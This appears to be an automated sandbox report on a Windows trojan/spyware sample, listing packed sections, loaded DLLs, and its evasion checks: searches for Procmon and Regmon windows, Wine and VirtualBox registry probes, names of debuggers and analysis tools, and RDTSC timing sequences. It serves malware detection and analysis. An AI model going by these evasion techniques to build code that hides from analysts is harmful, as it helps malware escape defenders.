Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_007799200_2_00779920
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: String function: 004275A0 appears 584 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: String function: 00464F40 appears 293 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: String function: 005D7220 appears 96 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: String function: 00465340 appears 41 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: String function: 00464FD0 appears 220 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: String function: 005044A0 appears 58 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: String function: 004650A0 appears 83 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: String function: 0043CD40 appears 68 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: String function: 0042CAA0 appears 62 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: String function: 004271E0 appears 43 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: String function: 0043CCD0 appears 53 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: String function: 005FCBC0 appears 90 times
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: String function: 004273F0 appears 102 times
Source: JbN2WYseAr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: JbN2WYseAr.exeStatic PE information: Section: ptayyfsq ZLIB complexity 0.9943666559188511
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_0042255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0042255D
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_004229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004229FF
Source: C:\Users\user\Desktop\JbN2WYseAr.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\JbN2WYseAr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: JbN2WYseAr.exeReversingLabs: Detection: 60%
Source: JbN2WYseAr.exeVirustotal: Detection: 56%
Source: JbN2WYseAr.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: JbN2WYseAr.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSection loaded: kernel.appcore.dllJump to behavior
Source: JbN2WYseAr.exeStatic file information: File size 4512256 > 1048576
Source: JbN2WYseAr.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x289a00
Source: JbN2WYseAr.exeStatic PE information: Raw size of ptayyfsq is bigger than: 0x100000 < 0x1c0400

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\JbN2WYseAr.exeUnpacked PE file: 0.2.JbN2WYseAr.exe.420000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ptayyfsq:EW;htlvnmme:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ptayyfsq:EW;htlvnmme:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: JbN2WYseAr.exeStatic PE information: real checksum: 0x4586d9 should be: 0x4535bc
Source: JbN2WYseAr.exeStatic PE information: section name:
Source: JbN2WYseAr.exeStatic PE information: section name: .idata
Source: JbN2WYseAr.exeStatic PE information: section name:
Source: JbN2WYseAr.exeStatic PE information: section name: ptayyfsq
Source: JbN2WYseAr.exeStatic PE information: section name: htlvnmme
Source: JbN2WYseAr.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174BB76 push eax; retf 0_3_0174BC51
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174BB76 push eax; retf 0_3_0174BC51
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174BB76 push eax; retf 0_3_0174BC51
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A55E push edi; iretd 0_3_0174A56B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A55E push edi; iretd 0_3_0174A56B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A55E push edi; iretd 0_3_0174A56B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A53B push ebx; iretd 0_3_0174A54B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A53B push ebx; iretd 0_3_0174A54B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174A53B push ebx; iretd 0_3_0174A54B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01748F1B push edi; iretd 0_3_01748F33
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01748F1B push edi; iretd 0_3_01748F33
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01748F1B push edi; iretd 0_3_01748F33
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_017473DA push ss; iretd 0_3_017473DB
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_017473DA push ss; iretd 0_3_017473DB
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_017473DA push ss; iretd 0_3_017473DB
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_017471CA push esp; iretd 0_3_017471CB
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_017471CA push esp; iretd 0_3_017471CB
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_017471CA push esp; iretd 0_3_017471CB
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0173E992 push ebp; retf 0_3_0173E993
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0173E992 push ebp; retf 0_3_0173E993
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174619D push ecx; iretd 0_3_0174619B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174619D push ebx; iretd 0_3_017461AB
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174619D push edi; iretd 0_3_017461CB
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174619D push ecx; iretd 0_3_0174619B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174619D push ebx; iretd 0_3_017461AB
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174619D push edi; iretd 0_3_017461CB
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174619D push ecx; iretd 0_3_0174619B
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174619D push ebx; iretd 0_3_017461AB
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_0174619D push edi; iretd 0_3_017461CB
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01746057 pushad ; retf 0_3_01746095
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_3_01746057 pushad ; retf 0_3_01746095
Source: JbN2WYseAr.exeStatic PE information: section name: ptayyfsq entropy: 7.95564888988546

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\JbN2WYseAr.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\JbN2WYseAr.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: B29B7D second address: B29B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: B29B8A second address: B29B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F953D015236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB59B0 second address: CB59C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F953D46ED9Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB59C6 second address: CB59CB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: C9FA3B second address: C9FA41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB4979 second address: CB497D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB50E8 second address: CB5101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB5101 second address: CB5105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB5242 second address: CB5246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB5246 second address: CB524C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB524C second address: CB5255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB5255 second address: CB526F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D01523Bh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F953D015236h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB526F second address: CB5279 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F953D46ED96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7868 second address: CB7884 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F953D015238h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jc 00007F953D015244h 0x00000013 pushad 0x00000014 jng 00007F953D015236h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7884 second address: CB789C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a pushad 0x0000000b jns 00007F953D46ED96h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB789C second address: CB78A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB78A0 second address: CB78BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F953D46EDA0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB78BD second address: CB78C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB78C3 second address: CB78C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB78C8 second address: CB78EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D01523Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jl 00007F953D015244h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB78EB second address: CB78EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB78EF second address: B29B7D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jc 00007F953D01523Ch 0x0000000e mov ecx, dword ptr [ebp+122D2B44h] 0x00000014 pop edx 0x00000015 push dword ptr [ebp+122D0071h] 0x0000001b mov edi, dword ptr [ebp+122D2C14h] 0x00000021 call dword ptr [ebp+122D3A25h] 0x00000027 pushad 0x00000028 jp 00007F953D01523Ch 0x0000002e xor eax, eax 0x00000030 pushad 0x00000031 je 00007F953D015244h 0x00000037 adc di, 0848h 0x0000003c popad 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jmp 00007F953D015248h 0x00000046 mov dword ptr [ebp+122D2A74h], eax 0x0000004c stc 0x0000004d mov esi, 0000003Ch 0x00000052 jng 00007F953D01523Ch 0x00000058 sub dword ptr [ebp+122D37BEh], edx 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 pushad 0x00000063 or dword ptr [ebp+122D37BEh], edi 0x00000069 mov esi, dword ptr [ebp+122D2A94h] 0x0000006f popad 0x00000070 lodsw 0x00000072 pushad 0x00000073 cmc 0x00000074 mov eax, dword ptr [ebp+122D2D1Ch] 0x0000007a popad 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f clc 0x00000080 mov dword ptr [ebp+122D37BEh], edx 0x00000086 mov ebx, dword ptr [esp+24h] 0x0000008a cld 0x0000008b nop 0x0000008c push eax 0x0000008d push ebx 0x0000008e push eax 0x0000008f push edx 0x00000090 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB796B second address: CB7979 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F953D46ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7979 second address: CB797D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB797D second address: CB79B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov edx, dword ptr [ebp+122D2D64h] 0x00000011 mov di, cx 0x00000014 push 00000000h 0x00000016 mov edx, 4718476Dh 0x0000001b call 00007F953D46ED99h 0x00000020 pushad 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB79B5 second address: CB79E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007F953D015248h 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB79E0 second address: CB79E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB79E5 second address: CB79F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB79F5 second address: CB7A79 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007F953D46EDA3h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 ja 00007F953D46ED9Ch 0x0000001f push esi 0x00000020 jmp 00007F953D46ED9Ah 0x00000025 pop esi 0x00000026 popad 0x00000027 pop eax 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F953D46ED98h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 0000001Bh 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 push 00000003h 0x00000044 or si, CFD9h 0x00000049 push 00000000h 0x0000004b movsx esi, di 0x0000004e push 00000003h 0x00000050 push eax 0x00000051 or esi, dword ptr [ebp+122D2B38h] 0x00000057 pop ecx 0x00000058 push 5E8B370Bh 0x0000005d push esi 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7A79 second address: CB7A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7B6B second address: CB7BCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop esi 0x00000010 nop 0x00000011 mov edi, dword ptr [ebp+122D39FBh] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F953D46ED98h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 jmp 00007F953D46ED9Dh 0x00000038 jl 00007F953D46EDA2h 0x0000003e jmp 00007F953D46ED9Ch 0x00000043 push C7D88FA9h 0x00000048 push eax 0x00000049 push edx 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d pop edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7CF4 second address: CB7CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7D6D second address: CB7D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7D71 second address: CB7D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7D75 second address: CB7DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F953D46ED9Dh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F953D46ED98h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov ecx, 71DDC231h 0x0000002d push 00000000h 0x0000002f mov edx, edi 0x00000031 call 00007F953D46ED99h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7DC3 second address: CB7DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CB7DC8 second address: CB7DDB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F953D46ED98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop edx 0x00000011 rdtsc
